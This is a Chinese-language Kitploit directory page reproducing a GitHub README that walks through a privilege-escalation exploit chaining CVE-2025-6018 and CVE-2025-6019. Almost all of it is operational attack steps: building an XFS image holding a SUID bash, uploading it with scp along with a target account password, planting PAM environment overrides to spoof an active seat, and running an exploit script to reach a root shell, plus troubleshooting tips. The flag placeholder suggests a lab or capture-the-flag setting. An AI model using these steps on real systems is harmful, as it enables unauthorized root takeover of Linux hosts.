Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-6018-CVE-2025-6019-Privilege-Escalation-Exploit — CVE-2025-6018 + CVE-2025-6019 权限提升漏洞利用 | Kitploit
工具/GitHubGitHub/muyuanlove/cve-2025-6018-cve-2025-6019-privilege-escalation-exploit
权限提升漏洞分析漏洞利用渗透测试红队二进制利用
GitHubmuyuanlove/cve-2025-6018-cve-2025-6019-privilege-escalation-exploit

CVE-2025-6018-CVE-2025-6019-Privilege-Escalation-Exploit

CVE-2025-6018 + CVE-2025-6019 权限提升漏洞利用

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
12127个月前尚未审核

CVE-2025-6018 + CVE-2025-6019 提权利用指南

📋 快速利用流程

步骤 1:准备 XFS 镜像(本地机器)

root@kitploit:~
# 创建 300MB XFS 镜像
dd if=/dev/zero of=xfs.image bs=1M count=300
mkfs.xfs -f xfs.image

# 挂载并安装 SUID bash
mkdir mnt
sudo mount -t xfs xfs.image mnt
sudo cp /bin/bash mnt/bash
sudo chmod 4755 mnt/bash
sudo umount mnt
rmdir mnt

# 验证(应该显示 300M)
ls -lh xfs.image

步骤 2:上传文件到目标

root@kitploit:~
# 上传利用脚本和镜像
scp exp.sh [email protected]:~/
scp xfs.image [email protected]:~/

密码: !QAZ2wsx


步骤 3:第一次登录 - 配置 PAM

root@kitploit:~
# SSH 登录目标
ssh [email protected]

# 写入 PAM 环境变量
cat > ~/.pam_environment << 'EOF'
XDG_SEAT OVERRIDE=seat0
XDG_VTNR OVERRIDE=1
EOF

# 验证配置
cat ~/.pam_environment

# 🔥 关键:退出登录(让 PAM 配置生效)
exit

步骤 4:第二次登录 - 执行提权

root@kitploit:~
# 重新 SSH 登录(PAM 配置现在生效)
ssh [email protected]

# 验证 PAM 是否生效(应该返回 "('yes',)")
gdbus call --system --dest org.freedesktop.login1 \
    --object-path /org/freedesktop/login1 \
    --method org.freedesktop.login1.Manager.CanReboot

# 执行提权脚本
bash exp.sh

✅ 成功标志

如果利用成功,你应该看到:

root@kitploit:~
✓ SUID bash found: /tmp/blockdev_loop0_xfs_xxxxx/bash
✓ Root access confirmed!

════════════════════════════════════════════════════════════
║ ROOT FLAG                                               ║
║ <flag_here>                                             ║
════════════════════════════════════════════════════════════

bash-5.2# whoami
root

🔧 故障排查

问题解决方法
CanReboot 返回 ('no',)确保已退出并重新登录(步骤 3)

📌 关键点

  • ✅ 必须退出重新登录:PAM 配置仅在新会话中生效
  • ✅ 验证 CanReboot:在执行脚本前确认返回 ('yes',)
  • ✅ 使用 SSH 登录:不要用 ssh -t user@host "cmd" 方式

🐱 小猫守护者

如果失败,请检查每个步骤是否严格按顺序执行!

下载工具
Not authorized 错误
检查 ~/.pam_environment 内容是否正确
SUID bash 未找到重新上传 xfs.image 并确保 SUID 位已设置